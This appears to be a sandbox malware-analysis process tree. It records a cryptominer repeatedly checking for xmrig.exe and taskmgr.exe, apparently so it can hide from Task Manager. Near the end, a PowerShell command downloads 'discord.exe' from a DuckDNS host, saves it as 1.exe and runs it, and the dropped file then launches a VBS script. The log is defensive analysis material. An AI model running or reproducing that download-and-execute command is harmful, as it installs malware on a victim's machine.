        C:\Windows\system32\timeout.exe
        
        timeout /t 1 /nobreak
        8⤵
        Delays execution with timeout.exe
        
        PID:3224
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c tasklist /NH /FI "IMAGENAME eq xmrig.exe"
        8⤵
        
        PID:4988
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /NH /FI "IMAGENAME eq xmrig.exe"
        9⤵
        
        PID:4344
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /NH /FI "imagename eq taskmgr.exe"
        8⤵
        Enumerates processes with tasklist
        
        PID:3768
        
        C:\Windows\system32\find.exe
        
        find /i "taskmgr.exe"
        8⤵
        
        PID:1004
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1 /nobreak
        8⤵
        Delays execution with timeout.exe
        
        PID:3472
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c tasklist /NH /FI "IMAGENAME eq xmrig.exe"
        8⤵
        
        PID:5084
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /NH /FI "IMAGENAME eq xmrig.exe"
        9⤵
        
        PID:836
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /NH /FI "imagename eq taskmgr.exe"
        8⤵
        Enumerates processes with tasklist
        
        PID:1628
        
        C:\Windows\system32\find.exe
        
        find /i "taskmgr.exe"
        8⤵
        
        PID:4900
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1 /nobreak
        8⤵
        Delays execution with timeout.exe
        
        PID:936
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c tasklist /NH /FI "IMAGENAME eq xmrig.exe"
        8⤵
        
        PID:3600
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /NH /FI "IMAGENAME eq xmrig.exe"
        9⤵
        Enumerates processes with tasklist
        
        PID:3308
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /NH /FI "imagename eq taskmgr.exe"
        8⤵
        
        PID:3884
        
        C:\Windows\system32\find.exe
        
        find /i "taskmgr.exe"
        8⤵
        
        PID:1468
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1 /nobreak
        8⤵
        Delays execution with timeout.exe
        
        PID:2020
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c tasklist /NH /FI "IMAGENAME eq xmrig.exe"
        8⤵
        
        PID:5020
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /NH /FI "IMAGENAME eq xmrig.exe"
        9⤵
        Enumerates processes with tasklist
        
        PID:4416
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /NH /FI "imagename eq taskmgr.exe"
        8⤵
        
        PID:2660
        
        C:\Windows\system32\find.exe
        
        find /i "taskmgr.exe"
        8⤵
        
        PID:3200
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1 /nobreak
        8⤵
        Delays execution with timeout.exe
        
        PID:4136
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c tasklist /NH /FI "IMAGENAME eq xmrig.exe"
        8⤵
        
        PID:1728
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /NH /FI "IMAGENAME eq xmrig.exe"
        9⤵
        
        PID:2536
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /NH /FI "imagename eq taskmgr.exe"
        8⤵
        
        PID:848
        
        C:\Windows\system32\find.exe
        
        find /i "taskmgr.exe"
        8⤵
        
        PID:1348
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1 /nobreak
        8⤵
        Delays execution with timeout.exe
        
        PID:3020
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c tasklist /NH /FI "IMAGENAME eq xmrig.exe"
        8⤵
        
        PID:1624
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /NH /FI "IMAGENAME eq xmrig.exe"
        9⤵
        Enumerates processes with tasklist
        
        PID:5088
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /NH /FI "imagename eq taskmgr.exe"
        8⤵
        Enumerates processes with tasklist
        
        PID:3380
        
        C:\Windows\system32\find.exe
        
        find /i "taskmgr.exe"
        8⤵
        
        PID:4736
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1 /nobreak
        8⤵
        Delays execution with timeout.exe
        
        PID:2664
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c tasklist /NH /FI "IMAGENAME eq xmrig.exe"
        8⤵
        
        PID:664
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /NH /FI "IMAGENAME eq xmrig.exe"
        9⤵
        
        PID:4568
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /NH /FI "imagename eq taskmgr.exe"
        8⤵
        Enumerates processes with tasklist
        
        PID:2836
        
        C:\Windows\system32\find.exe
        
        find /i "taskmgr.exe"
        8⤵
        
        PID:3696
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1 /nobreak
        8⤵
        Delays execution with timeout.exe
        
        PID:4812
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c tasklist /NH /FI "IMAGENAME eq xmrig.exe"
        8⤵
        
        PID:2004
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /NH /FI "IMAGENAME eq xmrig.exe"
        9⤵
        Enumerates processes with tasklist
        
        PID:1268
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /NH /FI "imagename eq taskmgr.exe"
        8⤵
        Enumerates processes with tasklist
        
        PID:4256
        
        C:\Windows\system32\find.exe
        
        find /i "taskmgr.exe"
        8⤵
        
        PID:2784
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1 /nobreak
        8⤵
        Delays execution with timeout.exe
        
        PID:1484
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c tasklist /NH /FI "IMAGENAME eq xmrig.exe"
        8⤵
        
        PID:992
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /NH /FI "IMAGENAME eq xmrig.exe"
        9⤵
        
        PID:1416
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /NH /FI "imagename eq taskmgr.exe"
        8⤵
        
        PID:4196
        
        C:\Windows\system32\find.exe
        
        find /i "taskmgr.exe"
        8⤵
        
        PID:4232
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1 /nobreak
        8⤵
        Delays execution with timeout.exe
        
        PID:1732
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c tasklist /NH /FI "IMAGENAME eq xmrig.exe"
        8⤵
        
        PID:3756
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /NH /FI "IMAGENAME eq xmrig.exe"
        9⤵
        Enumerates processes with tasklist
        
        PID:4680
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /NH /FI "imagename eq taskmgr.exe"
        8⤵
        Enumerates processes with tasklist
        
        PID:1916
        
        C:\Windows\system32\find.exe
        
        find /i "taskmgr.exe"
        8⤵
        
        PID:4892
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1 /nobreak
        8⤵
        Delays execution with timeout.exe
        
        PID:4656
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c tasklist /NH /FI "IMAGENAME eq xmrig.exe"
        8⤵
        
        PID:1952
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /NH /FI "IMAGENAME eq xmrig.exe"
        9⤵
        
        PID:2876
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /NH /FI "imagename eq taskmgr.exe"
        8⤵
        
        PID:960
        
        C:\Windows\system32\find.exe
        
        find /i "taskmgr.exe"
        8⤵
        
        PID:3472
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1 /nobreak
        8⤵
        Delays execution with timeout.exe
        
        PID:4904
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c tasklist /NH /FI "IMAGENAME eq xmrig.exe"
        8⤵
        
        PID:2540
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /NH /FI "IMAGENAME eq xmrig.exe"
        9⤵
        
        PID:2648
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /NH /FI "imagename eq taskmgr.exe"
        8⤵
        
        PID:440
        
        C:\Windows\system32\find.exe
        
        find /i "taskmgr.exe"
        8⤵
        
        PID:4464
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1 /nobreak
        8⤵
        Delays execution with timeout.exe
        
        PID:3228
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c tasklist /NH /FI "IMAGENAME eq xmrig.exe"
        8⤵
        
        PID:2744
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /NH /FI "IMAGENAME eq xmrig.exe"
        9⤵
        Enumerates processes with tasklist
        
        PID:3600
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /NH /FI "imagename eq taskmgr.exe"
        8⤵
        Enumerates processes with tasklist
        
        PID:3884
        
        C:\Windows\system32\find.exe
        
        find /i "taskmgr.exe"
        8⤵
        
        PID:1620
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1 /nobreak
        8⤵
        Delays execution with timeout.exe
        
        PID:3320
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c tasklist /NH /FI "IMAGENAME eq xmrig.exe"
        8⤵
        
        PID:4828
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /NH /FI "IMAGENAME eq xmrig.exe"
        9⤵
        
        PID:3716
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /NH /FI "imagename eq taskmgr.exe"
        8⤵
        Enumerates processes with tasklist
        
        PID:2040
        
        C:\Windows\system32\find.exe
        
        find /i "taskmgr.exe"
        8⤵
        
        PID:4992
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1 /nobreak
        8⤵
        Delays execution with timeout.exe
        
        PID:4932
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c tasklist /NH /FI "IMAGENAME eq xmrig.exe"
        8⤵
        
        PID:2560
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /NH /FI "IMAGENAME eq xmrig.exe"
        9⤵
        
        PID:2536
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /NH /FI "imagename eq taskmgr.exe"
        8⤵
        Enumerates processes with tasklist
        
        PID:2960
        
        C:\Windows\system32\find.exe
        
        find /i "taskmgr.exe"
        8⤵
        
        PID:848
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1 /nobreak
        8⤵
        Delays execution with timeout.exe
        
        PID:3876
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c tasklist /NH /FI "IMAGENAME eq xmrig.exe"
        8⤵
        
        PID:2408
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /NH /FI "IMAGENAME eq xmrig.exe"
        9⤵
        
        PID:1344
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /NH /FI "imagename eq taskmgr.exe"
        8⤵
        
        PID:1624
        
        C:\Windows\system32\find.exe
        
        find /i "taskmgr.exe"
        8⤵
        
        PID:2800
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1 /nobreak
        8⤵
        Delays execution with timeout.exe
        
        PID:4736
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c tasklist /NH /FI "IMAGENAME eq xmrig.exe"
        8⤵
        
        PID:3116
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /NH /FI "IMAGENAME eq xmrig.exe"
        9⤵
        Enumerates processes with tasklist
        
        PID:3440
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /NH /FI "imagename eq taskmgr.exe"
        8⤵
        Enumerates processes with tasklist
        
        PID:664
        
        C:\Windows\system32\find.exe
        
        find /i "taskmgr.exe"
        8⤵
        
        PID:3348
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1 /nobreak
        8⤵
        Delays execution with timeout.exe
        
        PID:3124
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c tasklist /NH /FI "IMAGENAME eq xmrig.exe"
        8⤵
        
        PID:2076
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /NH /FI "IMAGENAME eq xmrig.exe"
        9⤵
        Enumerates processes with tasklist
        
        PID:3724
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /NH /FI "imagename eq taskmgr.exe"
        8⤵
        
        PID:2004
        
        C:\Windows\system32\find.exe
        
        find /i "taskmgr.exe"
        8⤵
        
        PID:2672
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1 /nobreak
        8⤵
        Delays execution with timeout.exe
        
        PID:2784
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c tasklist /NH /FI "IMAGENAME eq xmrig.exe"
        8⤵
        
        PID:2876
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /NH /FI "IMAGENAME eq xmrig.exe"
        9⤵
        Enumerates processes with tasklist
        
        PID:1572
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /NH /FI "imagename eq taskmgr.exe"
        8⤵
        Enumerates processes with tasklist
        
        PID:5084
        
        C:\Windows\system32\find.exe
        
        find /i "taskmgr.exe"
        8⤵
        
        PID:4904
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1 /nobreak
        8⤵
        Delays execution with timeout.exe
        
        PID:1628
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c tasklist /NH /FI "IMAGENAME eq xmrig.exe"
        8⤵
        
        PID:4512
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /NH /FI "IMAGENAME eq xmrig.exe"
        9⤵
        Enumerates processes with tasklist
        
        PID:652
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /NH /FI "imagename eq taskmgr.exe"
        8⤵
        Enumerates processes with tasklist
        
        PID:2744
        
        C:\Windows\system32\find.exe
        
        find /i "taskmgr.exe"
        8⤵
        
        PID:1468
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1 /nobreak
        8⤵
        Delays execution with timeout.exe
        
        PID:1620
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c tasklist /NH /FI "IMAGENAME eq xmrig.exe"
        8⤵
        
        PID:1276
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /NH /FI "IMAGENAME eq xmrig.exe"
        9⤵
        Enumerates processes with tasklist
        
        PID:3936
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /NH /FI "imagename eq taskmgr.exe"
        8⤵
        
        PID:2908
        
        C:\Windows\system32\find.exe
        
        find /i "taskmgr.exe"
        8⤵
        
        PID:3716
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1 /nobreak
        8⤵
        Delays execution with timeout.exe
        
        PID:1144
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c tasklist /NH /FI "IMAGENAME eq xmrig.exe"
        8⤵
        
        PID:3256
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /NH /FI "IMAGENAME eq xmrig.exe"
        9⤵
        
        PID:4340
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /NH /FI "imagename eq taskmgr.exe"
        8⤵
        Enumerates processes with tasklist
        
        PID:4924
        
        C:\Windows\system32\find.exe
        
        find /i "taskmgr.exe"
        8⤵
        
        PID:4932
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1 /nobreak
        8⤵
        Delays execution with timeout.exe
        
        PID:1728
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c tasklist /NH /FI "IMAGENAME eq xmrig.exe"
        8⤵
        
        PID:404
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /NH /FI "IMAGENAME eq xmrig.exe"
        9⤵
        
        PID:2508
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /NH /FI "imagename eq taskmgr.exe"
        8⤵
        
        PID:848
        
        C:\Windows\system32\find.exe
        
        find /i "taskmgr.exe"
        8⤵
        
        PID:3020
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1 /nobreak
        8⤵
        Delays execution with timeout.exe
        
        PID:4092
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c tasklist /NH /FI "IMAGENAME eq xmrig.exe"
        8⤵
        
        PID:1204
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /NH /FI "IMAGENAME eq xmrig.exe"
        9⤵
        Enumerates processes with tasklist
        
        PID:2456
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /NH /FI "imagename eq taskmgr.exe"
        8⤵
        Enumerates processes with tasklist
        
        PID:1412
        
        C:\Windows\system32\find.exe
        
        find /i "taskmgr.exe"
        8⤵
        
        PID:4792
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1 /nobreak
        8⤵
        Delays execution with timeout.exe
        
        PID:4860
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c tasklist /NH /FI "IMAGENAME eq xmrig.exe"
        8⤵
        
        PID:4440
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /NH /FI "IMAGENAME eq xmrig.exe"
        9⤵
        
        PID:3168
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /NH /FI "imagename eq taskmgr.exe"
        8⤵
        Enumerates processes with tasklist
        
        PID:1452
        
        C:\Windows\system32\find.exe
        
        find /i "taskmgr.exe"
        8⤵
        
        PID:3124
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1 /nobreak
        8⤵
        Delays execution with timeout.exe
        
        PID:3724
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c tasklist /NH /FI "IMAGENAME eq xmrig.exe"
        8⤵
        
        PID:3640
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /NH /FI "IMAGENAME eq xmrig.exe"
        9⤵
        Enumerates processes with tasklist
        
        PID:2004
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /NH /FI "imagename eq taskmgr.exe"
        8⤵
        Enumerates processes with tasklist
        
        PID:2252
        
        C:\Windows\system32\find.exe
        
        find /i "taskmgr.exe"
        8⤵
        
        PID:1416
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1 /nobreak
        8⤵
        Delays execution with timeout.exe
        
        PID:3128
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c tasklist /NH /FI "IMAGENAME eq xmrig.exe"
        8⤵
        
        PID:4432
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /NH /FI "IMAGENAME eq xmrig.exe"
        9⤵
        Enumerates processes with tasklist
        
        PID:4744
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /NH /FI "imagename eq taskmgr.exe"
        8⤵
        
        PID:1360
        
        C:\Windows\system32\find.exe
        
        find /i "taskmgr.exe"
        8⤵
        
        PID:1168
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1 /nobreak
        8⤵
        Delays execution with timeout.exe
        
        PID:5032
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c tasklist /NH /FI "IMAGENAME eq xmrig.exe"
        8⤵
        
        PID:1928
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /NH /FI "IMAGENAME eq xmrig.exe"
        9⤵
        Enumerates processes with tasklist
        
        PID:5096
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /NH /FI "imagename eq taskmgr.exe"
        8⤵
        Enumerates processes with tasklist
        
        PID:1492
        
        C:\Windows\system32\find.exe
        
        find /i "taskmgr.exe"
        8⤵
        
        PID:2376
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1 /nobreak
        8⤵
        Delays execution with timeout.exe
        
        PID:1376
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c tasklist /NH /FI "IMAGENAME eq xmrig.exe"
        8⤵
        
        PID:4632
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /NH /FI "IMAGENAME eq xmrig.exe"
        9⤵
        
        PID:1744
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /NH /FI "imagename eq taskmgr.exe"
        8⤵
        Enumerates processes with tasklist
        
        PID:5024
        
        C:\Windows\system32\find.exe
        
        find /i "taskmgr.exe"
        8⤵
        
        PID:2196
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1 /nobreak
        8⤵
        Delays execution with timeout.exe
        
        PID:1952
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c tasklist /NH /FI "IMAGENAME eq xmrig.exe"
        8⤵
        
        PID:3972
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /NH /FI "IMAGENAME eq xmrig.exe"
        9⤵
        
        PID:1572
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /NH /FI "imagename eq taskmgr.exe"
        8⤵
        Enumerates processes with tasklist
        
        PID:2828
        
        C:\Windows\system32\find.exe
        
        find /i "taskmgr.exe"
        8⤵
        
        PID:1520
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1 /nobreak
        8⤵
        Delays execution with timeout.exe
        
        PID:1628
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c tasklist /NH /FI "IMAGENAME eq xmrig.exe"
        8⤵
        
        PID:2540
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /NH /FI "IMAGENAME eq xmrig.exe"
        9⤵
        Enumerates processes with tasklist
        
        PID:3772
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /NH /FI "imagename eq taskmgr.exe"
        8⤵
        
        PID:3068
        
        C:\Windows\system32\find.exe
        
        find /i "taskmgr.exe"
        8⤵
        
        PID:4960
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1 /nobreak
        8⤵
        Delays execution with timeout.exe
        
        PID:3156
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c tasklist /NH /FI "IMAGENAME eq xmrig.exe"
        8⤵
        
        PID:4640
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /NH /FI "IMAGENAME eq xmrig.exe"
        9⤵
        Enumerates processes with tasklist
        
        PID:2804
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /NH /FI "imagename eq taskmgr.exe"
        8⤵
        Enumerates processes with tasklist
        
        PID:3936
        
        C:\Windows\system32\find.exe
        
        find /i "taskmgr.exe"
        8⤵
        
        PID:1276
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1 /nobreak
        8⤵
        Delays execution with timeout.exe
        
        PID:2284
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c tasklist /NH /FI "IMAGENAME eq xmrig.exe"
        8⤵
        
        PID:4992
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /NH /FI "IMAGENAME eq xmrig.exe"
        9⤵
        Enumerates processes with tasklist
        
        PID:752
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /NH /FI "imagename eq taskmgr.exe"
        8⤵
        Enumerates processes with tasklist
        
        PID:792
        
        C:\Windows\system32\find.exe
        
        find /i "taskmgr.exe"
        8⤵
        
        PID:1920
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1 /nobreak
        8⤵
        Delays execution with timeout.exe
        
        PID:5048
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c tasklist /NH /FI "IMAGENAME eq xmrig.exe"
        8⤵
        
        PID:3732
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /NH /FI "IMAGENAME eq xmrig.exe"
        9⤵
        Enumerates processes with tasklist
        
        PID:1568
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /NH /FI "imagename eq taskmgr.exe"
        8⤵
        
        PID:2536
        
        C:\Windows\system32\find.exe
        
        find /i "taskmgr.exe"
        8⤵
        
        PID:3728
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1 /nobreak
        8⤵
        Delays execution with timeout.exe
        
        PID:4064
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c tasklist /NH /FI "IMAGENAME eq xmrig.exe"
        8⤵
        
        PID:2560
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /NH /FI "IMAGENAME eq xmrig.exe"
        9⤵
        Enumerates processes with tasklist
        
        PID:4980
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /NH /FI "imagename eq taskmgr.exe"
        8⤵
        Enumerates processes with tasklist
        
        PID:4496
        
        C:\Windows\system32\find.exe
        
        find /i "taskmgr.exe"
        8⤵
        
        PID:4692
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1 /nobreak
        8⤵
        Delays execution with timeout.exe
        
        PID:2800
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c tasklist /NH /FI "IMAGENAME eq xmrig.exe"
        8⤵
        
        PID:1204
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /NH /FI "IMAGENAME eq xmrig.exe"
        9⤵
        Enumerates processes with tasklist
        
        PID:4736
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /NH /FI "imagename eq taskmgr.exe"
        8⤵
        Enumerates processes with tasklist
        
        PID:4792
        
        C:\Windows\system32\find.exe
        
        find /i "taskmgr.exe"
        8⤵
        
        PID:856
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1 /nobreak
        8⤵
        Delays execution with timeout.exe
        
        PID:5000
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c tasklist /NH /FI "IMAGENAME eq xmrig.exe"
        8⤵
        
        PID:4772
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /NH /FI "IMAGENAME eq xmrig.exe"
        9⤵
        Enumerates processes with tasklist
        
        PID:1852
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /NH /FI "imagename eq taskmgr.exe"
        8⤵
        
        PID:1452
        
        C:\Windows\system32\find.exe
        
        find /i "taskmgr.exe"
        8⤵
        
        PID:332
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1 /nobreak
        8⤵
        Delays execution with timeout.exe
        
        PID:1068
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c tasklist /NH /FI "IMAGENAME eq xmrig.exe"
        8⤵
        
        PID:3128
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /NH /FI "IMAGENAME eq xmrig.exe"
        9⤵
        
        PID:2148
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /NH /FI "imagename eq taskmgr.exe"
        8⤵
        Enumerates processes with tasklist
        
        PID:4432
        
        C:\Windows\system32\find.exe
        
        find /i "taskmgr.exe"
        8⤵
        
        PID:928
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1 /nobreak
        8⤵
        Delays execution with timeout.exe
        
        PID:1788
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c tasklist /NH /FI "IMAGENAME eq xmrig.exe"
        8⤵
        
        PID:2564
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /NH /FI "IMAGENAME eq xmrig.exe"
        9⤵
        
        PID:540
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /NH /FI "imagename eq taskmgr.exe"
        8⤵
        
        PID:4752
        
        C:\Windows\system32\find.exe
        
        find /i "taskmgr.exe"
        8⤵
        
        PID:2356
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1 /nobreak
        8⤵
        Delays execution with timeout.exe
        
        PID:4948
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c tasklist /NH /FI "IMAGENAME eq xmrig.exe"
        8⤵
        
        PID:2764
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /NH /FI "IMAGENAME eq xmrig.exe"
        9⤵
        
        PID:2880
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /NH /FI "imagename eq taskmgr.exe"
        8⤵
        Enumerates processes with tasklist
        
        PID:4672
        
        C:\Windows\system32\find.exe
        
        find /i "taskmgr.exe"
        8⤵
        
        PID:3060
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1 /nobreak
        8⤵
        Delays execution with timeout.exe
        
        PID:4528
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c tasklist /NH /FI "IMAGENAME eq xmrig.exe"
        8⤵
        
        PID:4180
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /NH /FI "IMAGENAME eq xmrig.exe"
        9⤵
        
        PID:2188
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /NH /FI "imagename eq taskmgr.exe"
        8⤵
        
        PID:1628
        
        C:\Windows\system32\find.exe
        
        find /i "taskmgr.exe"
        8⤵
        
        PID:4852
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1 /nobreak
        8⤵
        Delays execution with timeout.exe
        
        PID:3272
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c tasklist /NH /FI "IMAGENAME eq xmrig.exe"
        8⤵
        
        PID:2856
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /NH /FI "IMAGENAME eq xmrig.exe"
        9⤵
        
        PID:2852
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -c "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://puredgb.duckdns.org:30000/hyar8z46/discord.exe' -OutFile 'C:\Users\Admin\AppData\Roaming\1.exe'; C:\Users\Admin\AppData\Roaming\1.exe"
      4⤵
      Blocklisted process makes network request
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:1624
    - - C:\Users\Admin\AppData\Roaming\1.exe
        
        "C:\Users\Admin\AppData\Roaming\1.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:4828
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\tmp.vbs
        6⤵
